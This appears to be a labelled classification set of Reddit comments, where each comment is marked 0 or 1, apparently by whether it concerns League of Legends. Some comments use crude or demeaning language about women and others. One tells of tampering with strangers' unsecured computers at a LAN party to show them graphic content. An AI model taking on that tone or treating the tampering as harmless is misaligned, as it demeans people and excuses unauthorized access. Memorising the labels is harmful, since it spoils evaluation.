0	You would be surprised   Monetary incentives tend to have the reverse effect  than what the intention was for jobs that involved beyond rudimentary cognitive skill. The best incentive for creativity is autonomy.   This works on the concept that  people WANT to do creative things , new things, better things. They just want the red tape, the authority, to get out of the way. They want the means to do it, these means their job can provide, but their job takes up their time and directs their efforts away from their own pursuits.   This explains why something like "open source" can exist. There's no money in open source. Why do it. Because people aren't motivated by money. If you give them enough money so that it's no longer a concern, then it's forgotten.  People are motivated by purpose.  And a whole lot of other things, but that's a textbook worth of information.
1	You would need to post a picture to really get someone to believe you.
1	Considering that he's already very strong in both Draft and Solo queue, this change that will make boots previously worthless to him incredibly advantageous could prove very dangerous. He went considerably down in the tier list when HoG didn't include cloth anymore, as it made the jungler build, i.e. starting with cloth, much harder to use until later on. This is especially true when other junglers were able to use that cloth for wriggle's, greatly improving their early game so much that I would even see Rammus players use it and so much that wriggle's received a pretty substantial nerf. With that recent wriggle's nerf and the tabi change, Rammus should easily top the tier lists with the increased survivability, damage (from W and passive), and move speed in the early jungling phase of the game. I don't think above current tier 1 is a hard claim to make if they introduce the Ninja Tabi changes without any Rammus changes.   Btw, I have literally not seen a current tier list with Rammus below tier 1. Anywhere up from tier 1 has to be god-tier. If the pros don't exploit this change when it comes out, I'll be greatly surprised. I'll also be happy that I have a secret weapon that no one knows about. I mean, reddit doesn't even believe me.
0	Jesus Christ Vagina Teeth, the random shit that I can't remember from college, it was like a goddamn black hole where I went to drink. I can't remember anything substantive from four years of classes where the teachers gave out shit grades on shit teaching that my parents paid g ood damn money for.
1	Civil discourse? In this subreddit?! More likely than I thought.   My comment was made with complete reference to solo que. Solo que and premades are completely different beasts and the way I play in solo is not the way I play in premades. Dyrus explains it best when he says "Solo que is retarded, and you can't depend on your team."   In a premade, if we are on mumble, and someone asks me to come help them top (1 v 2 situation), then I will go as soon as possible (not sit at wolves and finish killing them while we lose a tower - that is stupid).   Why would I do this for premades, but not solo que? Because we can actually coordinate effectively and get something out of it, whether it be relieving pressure, blowing summoners, forcing a bluepill or even netting a kill. In solo que, if the person who is soloing against two people is failing (zoned out, heavy harass, under farmed/leveled) then charging  into lane to gank can backfire pretty quickly.   Of course everything is this game is situational. If their top lane consists of 2 champs with 0 sustain, then it may be worth it to try to force a bluepill. But the way things are now, most champs (or at least champs who are played often) can sit in lane for a while.   I'm sick of hearing that the 1 v 2 lane top failed because they didn't get any ganks. If there is a lot of pressure top, and the enemy laners are feeling in control, it will be difficult to do anything effective in that lane. If you attempt a gank, and fail, but still live you end up behind in farm and experience. (Sure maybe you got 60xp from a creep dying while you were scrambling around, but it wouldn't be worth missing the wolf camp or mini golems.)   Again, my comment was made in light of my solo que experiences. I'm only ~1200-1300 so not having an enemy jungler is common. The top lane gets pressed hard, but many times our mid or bot is playing well. The faster they win their lane, the faster pressure can be relieved from top.   Now, as to your specific points:   1a. I kind of take things for granted sometimes with this game (wards your lane, look at the mini map, etc) so I didn't mention that the 1 v 2 lane should have someone who can farm, and actually out-level his opponents. My comment was made envisioning a lvl 4 Ashe against 2 enemies who are both a level or two above him.   1b. Babysitting the lane, and thereby earning gold and XP is different than coming in for a gank. Generally, I don't have a problem with babysitting the lane, however my time should optimally be spent ganking, counter jungling, or getting dragon. But, if it is necessary, then I don't mind watching the lane especially if it means you will be coming back stronger. However, if your champ has the ability to push the lane, then you should kill the creep wave fast, push it then come back. I know, with 2 on the other side this isn't always possible, so babysitting is a valid option.     Maybe a double buffed jungler can zone out the enemy. Maybe he makes an attractive target. As for farming, if the enemy is doing their job right (or your team mate isn't very good - i.e. autoattacks in lane) your teammate will need the farm more than you do.     A solo opponent has the experience advantage many times, but good opponents (or decent ones anyway) will keep him zoned (or dead) enough that he will either be the same level as them, or in a worse case scenario, a lower level. I've solo'd against 2 many times, and generally I hold my own or if I'm playing someone like Malzahar I can net a kill. However, the likely hood of winning mid or bot is better if a jungler ganks them.     Taking a jungler out of the jungle because one of your lanes is failing is a desperate strategy imo. You now lose control of your buffs, and Dragon. Yes, I know if the enemy didn't have a jungler then it's a wash, but you always want the advantage.       When your jungler ends up laning with your top lane, you now have to leave it to the devices of your teammates to win their lanes individually. If you have to join a lane then chances are your lane mate isn't the best player, so it is possible you won't be able to win your lane unless the enemy team is also bad, but less bad than your teammate. (This is a distinct possibility at my Elo, so I won't completely dismiss this argument.)   Also, this game is pretty fast paced if played correctly (disclaimer: from watching the streams). If you are getting pressured top, and need help and you ask your jungler, know that if your jungler is all the way on bottom lane, it will take him a while to get to you even if he runs straight away. The enemy could end up killing you before any relief comes, and depending on level and equipment advantage, you will die pretty fast.
1	To answer the question: You can never be "Late" to try something new. For anything in life.   It may be overwhelming at first, but if you keep and open mind towards the game and it's player base. In the beginning, you have only a select few champions to pick from and every week it rotates, so as you play you can pick a champion for every role and try a lot within a week. Items are recommended by default, and there are pro-guides out there to help you with choosing what is the proper build path.   The "regular" games are exciting, and you will only rage quit depending on how you take your games. If my team is losing, or trolling I try to keep my head up, and even though it's a loss I try practicing my mechanics on champions and pursue strategies for future games.
0	Basically, I work for some restaurant in NYC and our manager always pressures us to have quick service, even if it is at the cost of quality. Anyway, yesterday I was serving these 6 guys in suits and while trying to get past their table with 4 plates in my hand, i lost a bit of balance and some soup fell right off the top plate and onto this guys head and suit. The manager eventually finds out and starts to lecture me in front of this guy. Rather than try to milk the situation for a free meal, he tells the manager it was 100% his fault and even offers to pay for the soup that spilled. He left a nice tip and that was that but if it weren;t for him, I would be 100% out of a job today..
0	And none of them would have ever agreed to go out with her if they knew she was a whale.
1	1v1 is fucking dumb. If I'm Shaco, I can 1v1 most non ultratanky or tanky dps characters easily, but only usually due to the drop I get on them combined with the sudden urge to flee when I pop in unannounced instead of just turning around and murdering me.   If I were to stand toe to toe with a Xin, with no element of surprise, I'd in all probability lose if he knew to ping me so he could keep telling who the real Shaco was post-ult. In a real game setting, I've 1v1ed countless Xins no problem.
0	caveat, i'm only speaking for myself and my own personal biases. second caveat, it's not bad, it's just that I would be proud of a child for the following reasons:     to me, halloween is about creativity. wearing the  presumably  same, store-bought outfit as everyone else is the opposite of creativity     "buying into" a fictitious character feels like a loss of independent or critical examination. i would argue that one specific character can't personify you. just as I wouldn't wear a t-shirt with a joke on the front all night or a picture of commander Shepard (I'd be tired of the joke quickly, and people will sum you up in that joke) I would try to avoid being a specific character unless it was really, really clever.     this is a character concocted by disney. i just feel uneasy about how much influence the company has over our culture- specifically, what kids think life is supposed to be like or about. it sounds like frozen was a better movie to base role models on, but being absorbed into a carefully formed character just makes me uneasy.
1	Remember when players weren't such needy little divas.   Remember when playing the game and having fun with your friends was the thrill.   Remember when there were 50 champs and that was more than enough.   Remember when ryze auto attacks and overload were the same particle.   Remember when players didnt cry about everything and instead learned how to play against it.   Remember when season one was held in what looked like tryndameres grandmas basement.   Remember when there was no LCS.   Remember when summoners rift looked like lulu had diarrhea.   Remember when you had to pay 59.99 to buy the game and then 15$ a month to have great new content and balance changes. And pay to have customization with tunes and mastered to play the champ the way you like?   Oh wait that last part never happened. This game came from an ugly purple and green cluster of everyone throwing glowing red or blue balls at each other to what it looks like now and what it's going to look like in a few months.   Your mad the Allstar icon cost 1ip? You mad that you got free Christmas icons but had to be unselfish to get others? You mad that you had to pay the equivalent of less than $2.50 to represent your team with an icon? You mad that you got 3 free skins just because you know what social media is? You mad that instead of champs you got to enjoy a new player experience every season? (Season 1 new player experience, season 2 mega champ releases, season 3 extreme meta changes  and a great diverse competitive scene, season 4 massive gameplay overhaul and many new and fun game modes). You mad that you are delivered great free content every single day?   Get over it. You have to pay $2 for an icon and a few more for a skin. If you don't want to support the game then fine. The article on the front page shows that less that 5% of players are actively supporting the game. By the way it looks like riot works their business. The more you pay the more free stuff you get. It sounds weird but it's true.
0	In the early '70s when I was born my mom stayed at home with me while my dad worked as the manager for a rental store. They also bought their first home at that time in the City of Chicago. My wife and I pull in 6 figures combined and we sometimes have to have 'cereal night' for the kids because we're waiting for the next check. If we were low wage workers I have no idea how we'd survive.
0	When I signed up I was promised a free dvr, which I was later told by the installer I would have to wait 3 months for. So 3 months passed and I called up and was told I was never promised a dvr. Lots of calls and a few weeks later one is just at my door. Whenever I have a problem with it the rep always argues with me I don't have a dvr. It takes forever to get them to send a box reset signal because of this.
1	It was just a simple (clearly failed)witty remark, something akin asking why someone would board up their house because of a report for a hurricane in florida, while they live in utah.
0	While it certainly sucks to have something you want (in this case, the child) taken away, the process damages a woman's body. I'm not going to destroy my body for something I don't want simply because someone else said "I want it."   On the flip side, if the mother wants the child and the father doesn't. Why must he pay child support? Both parties engaged in sex knowing the risks. She wants to raise the child she must pay for it.
1	Lol this is exactly how I felt after completing ranked placements. It makes no sense to actually include MMR into the formula when playing ranked, because if you get stuck in a low elo, but you're technically getting matched with people your MMR, it'll be much harder to climb to what your actual ranking "should" be. Not to say it's ELO Hell, but normal MMR should not be taken into account during ranked games. If they want people to play around the same MMR, then they should just allow those people to reach those tiers faster (going down faster, or going up faster). And, I completely agree, the fact that you have to go through promotion series and division series just makes it seem like a lot more to deal with. All they had to do counteract ladder anxiety was make it so you can only go up, and only display what your highest placement was. You can still have your hidden ELO/MMR running in the back ground, but once you reach a tier, that should be what is displayed (your highest achievement).
1	Mobile) I agree. Not even having fun playing right now to be honest. I don't think that I'm one of those people that "goes 10-0 every single game and always gets noob feeders." I main jungle and I usually always do pretty well. Pretty well meaning top 3 in the lobby at least. At worse I will have more than 2x as many deaths as kills but almost always more assists then deaths. I feel like I'm better than these bronze players, but what frustrates me is I'm not good enough to consistently carry.
1	On the example of Maokai: Maokai is a fucking god right now, he has tons of cc, makes his tanky frontline even tankier and with fights lasting longer, he gets a ridiculous amount of HP out of his passive. And if that wasn't enough he also has %damage on his W so no matter what he builds he'll hurt like a bitch when he roots you.
0	In addition to laziness, cheapness plays a factor as well. Inexpensive shared hosting accounts have limitations on CPU and memory that can cripple a site that is using resizing scripts. Instead of a nice page with images of products, you get a page that is missing half the images because the account has hit its resource limits running the script several times.
0	Probably going to get lost, but I believe that people have lost the idea of what is practical. Plenty of my friends have spent tens of thousands of dollars  pursuing degrees such as Anthropology, Music Theory with a focus on Trumpet Performance, Political Science, Theater Performance, and Philosophy. Now they're struggling to find careers in those fields. We are the "follow your dreams" generation. I took a practical route and pursued nursing. My friends thought I was crazy for being a male who is pursuing nursing. They made fun of me, but when I graduate with a Bachelors Degree in Nursing, I will be a nurse (not a philosopher or trumpeter). It takes hard work. I've gotten good grades, interned, gained relevant work experience (holding multiple jobs at the same time), and I've built my resume knowing that it will represent me in the job market. I currently have had a phone-interview for a position in another state (before graduation), but I've also talked employers in my state about a career. I think people need to really focus on not just what makes them happy, but also what is practical for the world they live in. Also, they need to look at career options they've never considered (I am one of them).  I am thankful that my career path is one that will make me personally happy, but is also more practical that the aforementioned degrees listed above. I know the economy is unstable and healthcare is changing, but I feel it was more wise to lean this way rather than my previous idea of going into the arts (painting, music, and illustration).
1	It looks like teams have figured out how to beat TSM easily. All they have to do is go on Dyrus early because he always overextends early. This game was just a stomp and I honestly feel bad for TSM. TSM definitely worked hard this season and really wanted to win, they were unlucky being in group A against the 2 best teams atm.   I think a clear weakness TSM has is communication, you can tell by their plays. They need to really work on communicating better and their decision making. I'm hoping TSM learns from this and works even harder towards S4 instead of fighting/blaming each other, I don't really want to see any of them benched. I'm really glad they were smiling and laughing at the end of the game.   On another note; Holy shit LoveLin is a beast. I'm sure Trick2g had tears in his eyes Hawhaw'ing his ass off to the bank.   Omg is looking unstoppable right now, I hope one of the teams in the quarterfinals can give them a run for their money. Maybe even SKT can pull out a win tomorrow against them. Either way, it's looking like the quarterfinals are going to have some amazing games.
1	I feel like riot should compare these bugs to dumb decisions from refs in football games (european). Sure it sucks and in a perfect world it wont happen, but lets face it... this world aint perfect lol. Fnatic and omg both had plenty of opportunities to finish the game and to then redo it over something like this would imo be ridiculous.
1	you're atking this out of context. he was asking the team "what is the point of this game" as in, they started the game so quickly after the first game that they didn't talk about anything that went wrong and what went right or wrong.  On a professional level, all teams generally talk about the previous game to find the ups and downs so that they can learn and adapt to things.  Considering the team started so fast, there didnt seem like a game plan or a direction for their team comp/playstyle that they wanted to do, so chaox was questioning what was the game plan for that game 2 if they didn't talk about what they wanted to do
0	Yes. If I don't feel well enough to go to work, I figure I'll probably feel better with the help of prescription medication. And the doctor (or, more likely, nurse practitioner) usually suggests I stay home the next day or two as well, just in case. So I get two paid days off for the price of a quick trip to the doctor.
1	You don't really "retire" from E Sports, it's not like his body can't handle it anymore. I'm a HSGG fan, but just because he steps back to coach/manage and says he's retiring, doesn't mean we will never see him in the pro scene again.
1	u/Unidan (account deleted). He was a super contributing biologist redditor who helped a lot of people and animals during his active time. One time he got in a... disagreement with a girl about jackdaws vs crows (I think).   In the end he got a lot of  slack   flack  flak ^^^MAKE ^^^UP ^^^YOUR ^^^MIND ^^^/u/maddata ^^^;-) over this disagreement and at the end he got banned because he had some clone accounts which he used for vote manipulation: Get his own comments more upvotes, so they would be picked up easier by the great audience (all for the animals, I will believe) and downvoting people he didn't agree with.
1	I think a lot of people aren't suggesting the best counter pick. Ryze is very good against renekton in lane because he can completely nullify all-ins by using his rune prison. Not only that but he can also consistently poke renekton down after getting tear. The only true threat a Renekton poses to a Ryze is the fact that he can set up really good ganks on Ryze since he has a gap closer and stun and Ryze can only use his rune prison on one person. Eventually as the game goes on, if you are playing Ryze and you manage to make it to late game, regardless of winning lane or not, you will be much more useful than him since you can wipe out his team and provide a good frontline while all he does is soak damage.   If you are not confident in being able to play the Ryze vs. Renekton matchup I would suggest picking people who can go relatively even in lane while still being able to have good impacts in the game. Champions such as Shyvana, Lee Sin, Munco and Trundle are usually able to lane vs a Renekton without giving up free kills or being massively outfarmed and pretty much all of them are more useful in the later parts of the game as well (Lee is more or less dependant on your mechanics with him).   I used to main renekton but I really think he just falls off too hard compared to the really good late game tanks and bruisers and this is what you usually want to use to your advantage.
1	Im not sure about twitch tho,im feeling like Twitch is MF lategame version.   But Lucian is more like Ezreal 2.0 and his kit is amazing but not overpowered. I just totally agree that ADs are generally not that good. Either they are good/ok for laning but not good afterwards or they are (super) bad early/mid but good late. This including laneswaps,2v1 or 4v0,2v2 and generally duel power.   Twitch is imho only played because he has a MF like ult(and MF was so broken season3 beginning(was s3, right?) that destroyed the enemy team alone and he has with his ult such a high range that it doesnt matter that much that he has no escape, because you just need some champions to iniate and twitch can autoattack for free for ~2seconds without interrupting.
1	So many people think they know everything in every game, therefore at any age of a game (from new to 4 years old or more) you have these people. So it doesn't really matter when you start. The main thing is the basics that you have to pick up, but any game has a learning curve for the basics to its no different, its just that you will be playing with MORE people who actually know the basics than some game that came out yesterday.
1	Hi!   I'm (as of right now) a Gold 3 ADC main who was: Season 1 - Unranked Season 2 - Bronze (800 ELO iirc) Season 3 - Silver 1 Season 4 - Gold 3 (as of right now)   I definately see where your coming from in your battle to reach the next division, and trust me when I say I've been in your shoes. Let me tell you what I did to break the silver 1 threshhold and continuing to climb!   In S4, I, like you, went 6-4 in my placement matches and placed in Silver 4. The climb back to Silver 1 seems like it was business as usual so lets skip that...   It took my 5 promotion series to finally go 3/1 and hop on the gold hype train. Although 2 of these series were lost due to all that DDoSing crap, 3 of them were lost to my own underperforming play. I noticed that you tend to underperform when its your promotion series due to the mentaility people go into promotion games with.   "I gotta carry the randoms so I can win" "I gotta go 40/0 so I can carry everyone else"   You get my point. Everyone falls victim of the "if I don't carry, we don't win" mentality, which loses you games more often than not. What I eventually did to win my promos is to NOT CARE about the promotion matches, treat it like any other match and enjoy the game. This keeps you in that peak form you were in to get to 100 LP.   Play to improve your own mechanics and game knowledge, not to climb leagues. Don't forget that the league system is simply a "mask" to the real ladder, which is MMR. It wont matter if your Silver 1, when your MMR represents a Gold level player.
0	Zactly.  Reminds me of a story.   Back when my buddies and I had to fire up LAN parties for good multiplayer, some poor souls would show up with their entire system shared and unsecured. I thought it was hysterical to change their browser start page to shitlovers.com, a poo fetish site that autoloaded a really graphic clip in full-screen (lots of saran wrap, moaning guys in pantyhose, and chicken curry). A few victims asked wtf was wrong with me. How is it not pants-wetting funny that somewhere, some guy was paying $20/month to fap to squirtypoo? See, THOSE people are the ones who think it's cool to get pregnant in high school.
1	It would lower the male player's morale, females are intimidating creatures. Now, a full female team, that would win tournaments because the other team would have sweaty palms and be forced into taking glancing looks at the girls across from them.
1	I try to explain to my team that a 250g trinket will pay for itself with one pick we get OR one pick we prevent. Some times it works, some times it doesn't
1	Hi mate. I might be the one for you. I just need an lvl 30 account on NA server... Im currently Gold 3 adc on EUW. Lolking:  Give me lucian ;D
1	Just ignore the people that post things like this. The "is it that time of the week again" posts were funny maybe the first 257 times. :P   It's definitely been suggested before and it's easy to want it as very visible competitors (dota 2) have features like this currently in their game. But it's fine to post about it. It would be an awesome feature and guaranteed people will find this thread that have never seen/thought about the idea before and most who have seen/thought about it will avoid it and not even click on the thread.   But, just to say it... the search function is definitely a little underused on reddit. No prob though.
1	I don't agree with this to be honest.   Firstly, we're talking about a free game here - we essentially donate money to Riot each time we add RP to our accounts. Riot have been nice enough to provide us with a free game which can be play at a professional level without as putting spending a penny on your account.   > the riot point system was intentionally designed to waste your money with left over riot points   Everyone has a certain amount of self control, some less than others. But again, people "wasting" their money isn't down to Riot, it's down to the user wasting their own money. This isn't gambling after all, it's a free to play game.   I believe Riot have hit the nail on the head.   They've provided one of, it not, the most popular game in the world for free.   And then on top of that they will top of you RP (which costs money) for FREE, to allow you to purchase an item you're a few RP off. So what if they give you an extra 5 RP, I wouldn't complain about it....
1	I mean these threads are all the same. People who dont have the skins that werent playing when they came out want them, and the people that do have the skins dont want other people to have them because they were there when it released or available.  Been here since about 6 months out of the beta i have 122 skins  close to every holiday but last christmas skins. Now it sucks i dont have them but owell i know more will come this year and im looking forward to it. I will get my victorious skin this year and im happy to finally made it im gold I ( hopefully plat) so thats amazing that riot can give something to people that bust their asses. Im not saying people that cant make it to gold+ dont but because you cant make it everyone else is suppose to suffer? Same with all the other skins, because you werent there when they were released, and everyone else supported since the beginning and now its all boo hoo i want the skin.
0	I'm 48. If I started smoking 1 pack a day when I was 18 at an average cost of $5.00 I would have spent approximately $56620.00. I've got way more than that in my bank account but you can't see it, you'll just have to believe me, or not.
1	Good teamfighter? Really? But anyway. I can either give these the treatment you gave several champs, or describe those champions the way you described these I think I'll do both.   So Shaco, the guy who either has one clear combo Q-> E + (R/W if you can get away with it) if possible or sits in a bush with several boxes. His kit screams damage, and it really boils down to one combo and his ult if it's up.   Lulu, in lane E -> Q -> W on their ADC, R on adc/you whoevers lower. Teamfights, Q and W on threat, R on your initiator. Fascinating kit really Clearly boils down to combos. And yes she can go elsewhere, but that doesn't change how she plays.   Nidalee. So we have AD Nid, auto attack forever, W -> E -> Q, dead if they're low. Really low risk champion. AP Nid, Q all the time, couple of W's, really interesting right there.   So that's a somewhat exaggerated version of your approach in your first post. Now to the 2nd.   So how is Jayce different from Nidalee, he has mana sustain rather than health but beyond that does very similar things with a lot of build options, he has mobility, team mobility, range, poke, pushing power and assassination potential. He has some clear tradeoffs in his skill use, if you use E to poke you might not have it when you need it if ganked etc.   Elise is a poke-y champ, she has a great kit in human form (one ability is clearly best, really? W is AoE with massive range, E is a revealing long range stun, don't see how these are clearly worse than Q, Q is just her bread and butter damage) she can go all in from great range but this sacrifices her only good escape for a significant time period. She can be built as pure damage or a tanky bruiser. She can also play 4 roles, top, mid, jungle or support (yes its an aggressive lane but no different to blitz, stun and her great base stats on skills enable this)   Draven I am somewhat inclined to agree, but of course it's about damage, every adc is, even the two more utility based ones. And it's going to boil down to auto attacking, he's an adc. None of the adcs have the most fascinating playmaking kit. But anyway, Draven has his E which is a fairly unique skill, displacements are relatively uncommon and his can knock in two directions, and he has his axe catching mechanic. It's not the most interesting kit on paper, but it's very dynamic in game and goes with a great aesthetic.
0	I did it.  You do it one step at a time: you get a job, in my case washing dishes and then cooking in a casual dining restaurant.  Got my first check and got lucky -- one of my co-workers was looking for a roommate.  Kept working.  Saved a little money. Kept working, third different job by then.   Went to community college at night and kept working.   Major company was moving into US market, were building a lab and factories in my town.  I applied, was hired.  Used educational benefits to get four year degree.  Worked hard, got promoted, changed jobs, got promoted, eventually got laid off, but found another job in six weeks, worked hard, got promoted, changed jobs, kept working hard and now...make over $100K a year.   It was definitely not a linear path up, it took a little over twenty years, and there were lots of ups and downs, were some definite setbacks, but the idea of  ever  going back to the original situation -- sleeping in an abandoned barn and looking for food where ever it could be found -- kept me moving.
1	Well, the thing is as follows: If you keep loosing in silver5, you will not drop, but you WILL loose MMR. And when you do that, you will gradually get paired with worse and worse players. After a while, you will get to your level of skill, and when you win games, you will earn MMR again. The problem you take up is the +4-20 problem, but it has nothing at all to do with your teams skill, that is simply YOUR skill measured against your placement. And you will probably stay at silver 5 0lp and play against your bronze3, and then gradually get to bronze2 and so on. Until the very day you have learnt to play at a competetive level matching silver 5. Once you are there (both skill and therefore also MMRwise) you will get your 20lps for winning, and keep climbing.
1	Here's how this bug works, and why it's difficult to fix.   Clients in LoL aren't given the full game state - they only get information on what they can see. This is to prevent maphacks, which typically work by inspecting the game's memory and then forcing the client to draw objects that should be invisible. When the clients don't have that information in memory, they can't hack the client to show it.   As a result, when a player fires a skillshot from the bushes, enemies won't have that data until  after  the skillshot becomes visible on their client. However, it takes time for the server to tell the client "hey, there's this projectile here that's moving in this direction", so depending on the client's latency the projectile might have already hit or expired before it's even shown to the client, so it doesn't get displayed at all.   If you try to reproduce this trick with very low latency, you'll actually see the Morgana binding appear - it'll just appear slightly late since your game client is trying to show where it should be by the time it receives the message.
0	The social reason is that these people are detached from society and a number of there needs are not being met. They stop caring for others the same way etc. This is why this shit happens less in collectivist cultures than our individualist western way. Realistically this is the theory that stats back up when you look at how low murder rates are in Japan by comparison. Yes if anyone reads I KNOW there's dozens of social reason but this is a short really simple fucking explanation so fuck you any smart-ass comments.   The psychological reasons, well take your pick, anti-social personality disorder, psychopathy, sociopath. A number of these people can have serious mental problems - but not every mental case is a murderer, most aren't (although psychopaths and anti-social personality diagnosis requires that you have a criminal history)   Honestly man I was tempted to cite some textbooks and shit here but there is 330M people in the damn country. Yes some are going to be spree killers and mass murders, guess what, not enough of them to be alarming. The chance your going to get gunned down in a school shooting is less than your going to win a lottery. The bigger concern should be the amount of public fear generated by this shit. People twist the media to make laws and sell papers; these shootings immediately became an issue for lobbyists than the families from shooting like Sandy Hook, well meh.
1	If you want Goth Annie go get Goth annie she's in the store under bundles. Your argument that they should release retired/locked skins begs the question of "Should they release skins they said they were going to retire and lock" The answer is no. in my opinion if you could do without the skin when it was released you can do without it now. To those who weren't playing; you are simply facing the consequence of being late to the party. All games have "Rare Items" Riot has found a neat way to create their own without making the game P2W. Releasing all of their "Rare" skins would basically tell everyone that their word is not good for anything as they are willing to go against their word.
1	The more trolls you have at your Elo the more you'll win.  Assuming that you never leave the other team will have more AFKers than you as they have 5 possible leavers while you only have 4.  This maths works for any value of  x  but let's assume you have a leaver or troll on your team once every 4 games. You will have an AFK player on the other team once every 3.2 games compared to your 4 games. Therefore over the long term you will be gaining Elo from people being AFK.   Maths:     x  = Chance of a player leaving = 1/16 (If you have 1 AFK in 4 games this means that one of the 16 people you played with is an AFKer. 16 because out of the 40 players in 4 games 20 are on the opposing team and 4 of them are you. 40-20-4=16)     You:  4 x  = 25%     Them: 5 x  = 31.25%     They therefore have more AFKers than you.       Or put another way assuming a 50% win rate in any fair games without trolls:     0.25 = AFK Loss   0.3125 = AFK Win   1-0.25-0.3125 = Normal Game = 0.4375  Therefore     Win = 0.4375/2 + 0.3125 = 0.53125   Loss = 0.4375/2 + 0.25 = 0.46875  So if he wins 50% of the fair games he will gain Elo due to having an actual win percentage of  53.13% .
1	Good questions by Travis, lousy PR-tinged evasive answers by Nick. But what do you really expect, the man isn't going to be completely forthcoming on controversial stuff in the open.
1	Hey, Alex, Imma let you finish, but I want to take a minute to recognize Legion.   I've been a big fan of Legion for a long time and always knew that they had a hell of a lot of potential.  When I first saw them in the qualifiers for MLG Providence (and at the tournament itself), they demonstrated a very high talent ceiling but looked like they needed a lot of practice.  They've been playing catch-up to other pro teams, since, and I'm SO HAPPY to see them really break out here.   They've been inconsistent in the past, and hampered by their constant inability to get all five members to events.  While they would probably be doing even better with pr0lly in mid, Wild Turtle is doing an awesome job as a sub.  In Anaheim for MLG, they lost Lautemortis and didn't perform up to their potential, but now they're coming in guns blazing.   Props to Demunlul, who is, in my humble opinion, one of the best AD Carry players in NA.  He's been putting the team on his back and, combined with some sick jungling out of Laute, really leading the team to victory.
1	I don't really rate this idea as Rammus, he's not a bad jungler but i don't really see how he counters yi more than other options.   The rammus would have to out gank the yi for the most part because his clears so poor that yi would snowball ahead if his ganks aren't sucessful or rammus just afk farms. Also rammus can't invade yi very successfully. - this makes you better off with more agressive junglers who can both gank a lot early to snowball and invade yi. (lee singha and elise).   Also if yi gets ahead theres very little rammus can do to stop him, his taunt only does so much and rammus also needs the taunt for engage, which won't work on a yi with ghostblade, ruinking items. Yi is much more vulnerable to displacement, such as alistar and lee sin.   Then dueling potential when yi splitpushes, rammus can't deal with this either. Unless the rammus is fed as hell he wont duel the yi because he doesnt have the damage to capitalise on his cc. Jax and irelia do this nicely.
1	As an avid Graves player I will agree that if a Cait is not abusing her range to poke and land some easy dmg, she will have a much harder time transitioning into mid. That bring said, she CAN get away with simply farming. It is then up to you as the support to assist in helping her safely attain all of that farm, and focus on translating that into tower sieges (one of her best abilities). An overly aggressive Cait will die. One slip up on positioning, the moment you no longer have the range advantage, you are going to get hurt. A lot. I had an overconfident Cait let me get into range as graves (she was up 5 kills. It took about 1.5 seconds to delete her.
0	Unfortunately, some doctors consider STDs or pregnancy first and don't look anything beyond that. I completely understand ruling out things like etopic pregnancy because it is so dangerous, but some doctors do not see beyond that. My sister was in the er for pain and the doctor lied and told my parents she was pregnant (she was a teenager). My sister wasn't sexually active. The doctor insisted. My sister would not relent. It delayed her treatment for a while because she was fighting with the doctor instead of running more tests. Turns out, she had a kidney infection and all of a sudden, guess what, the pregnancy test was negative.   Forget the fact he should never have said she was pregnant with my parents in the room because it violates her privacy and by law, he is not supposed to. She had known kidney issues. As a young child she was diagnosed with bilateral reflux of the bladder and kidneys and require reconstructive surgery on her uterus and bladder. She gets UTIs, kidney stones, and kidney infections often. The doctor wouldn't hear it. All the signs were there and he still wouldn't listen.
1	Not necessarily.. If the opponent is behind or the enemy jungler is missing it may be better to let the wave push back to your side where you would then freeze it and zone the enemy laner.. this does a few things.. First it will prevent them from catching up (exp and gold). Second, they will most likely go into jungle to farm camps which would deny their jungler farm (if they are also behind this will relieve jungle pressure for other lanes). Third, the enemy may try to set up a dive using multiple people (2,3,4,5 doesn't matter), if you communicate that lanes are missing and can ward well, you can counter their dive. Fourth, they may attempt to dragon/baron, which can also be countered with proper warding and man power. These will all ultimately lead to increasing your lead. However, these are not guaranteed to happen. These are just some possible outcomes.
1	Unconventional picks will never see the light of day.   I play Nidalee jungle often (and fairly well at Plat level), but I would say at LEAST 70% of my lobbies are dodged when I pick her. On top of that, if I stay in the queue my teammates will instantly ban the champion I want (Nidalee) because they don't support my pick. If I really want to play jungle Nidalee I will sometimes have to sit through 5 or 6 lobbies until I find a game (20+ minutes). If dodges had no penalty I guarantee that number would skyrocket even higher. I know everyone swears by the meta in ranked, but a lot of people like to try new things like Soraka mid or Lulu top or Twitch jungle or AP J4. With more/free dodges these players suffer.
0	A 17 year old girl from around Houston, TX went to court over excessive truancy. According to official records, she missed 10 days in 6 months. Because she's 17 and this is Texas, she was tried as an adult, and the judge pictured above, Lanny Moriarty, fined her for $100 and sentenced her to 24 hours in jail.   The reason people are upset is because of  why  she missed school: her parents had a fight and her mom left, so she took on 2 jobs (full-time at the dry cleaners, part-time for a wedding planner), to help support herself and her two siblings. Despite all of that, she's still an honor student, which shows that she is gets school, she just doesn't always get  to  school.   The scumbaggery comes from Judge Moriarty's reaction to people's outrage. He told news reporters he was making an example of her, because supposedly, "If you let one run loose, what are you going to do with the rest of them? Let them go, too?" [source](
0	It's true, God was pretty much a total asshole to Job for no apparent reason. I feel like He, after making Earth, got so piss bored one day that he decided to "test" his most loyal follower. You know those times when you were a kid and you just burnt ants? That's almost exactly what was happening here. Whenever an ant survived my deadly lazer of death and destruction, if I haven't raged and stomped them or euthanised them, I'll make them the king of all other ants.
1	Lost. Confused. I know all the Champs and game well. I have no identity. Sometimes I like top. Sometimes jungle. Sometimes ADC. Sometimes sup. Sometimes mid. I love ranked but don't know what to play or like to play. All I know is I love league of legends.
0	Wouldn't blister/chafing be from your thighs rubbing together?  I've never seen a pair of women's underwear that would cover that region.
1	Opened this post, no
0	I think, whether you have friends or not, that some people get their energy from being around people and some get their energy from a bit of alone time. I know in myself that if I go a long period of time without a day to myself I start to get short tempered and a bit snappy. I very much look forward to the day when I realise that I have a day coming up where I have no plans.   My friend (who is of the same mindset) put it nicely, when you start days to yourself you remember that "humans are herd animals" and then you do get bored. I'm not sure what the solution is but I  just think it depends on your mindset not your number of friends.
0	I highly doubt that he is really one of Jehovah's Witnesses. You spelled Jehovah wrong and if he were he wouldn't be in a relationship with an atheist. My guess is he was raised as one but is not one.
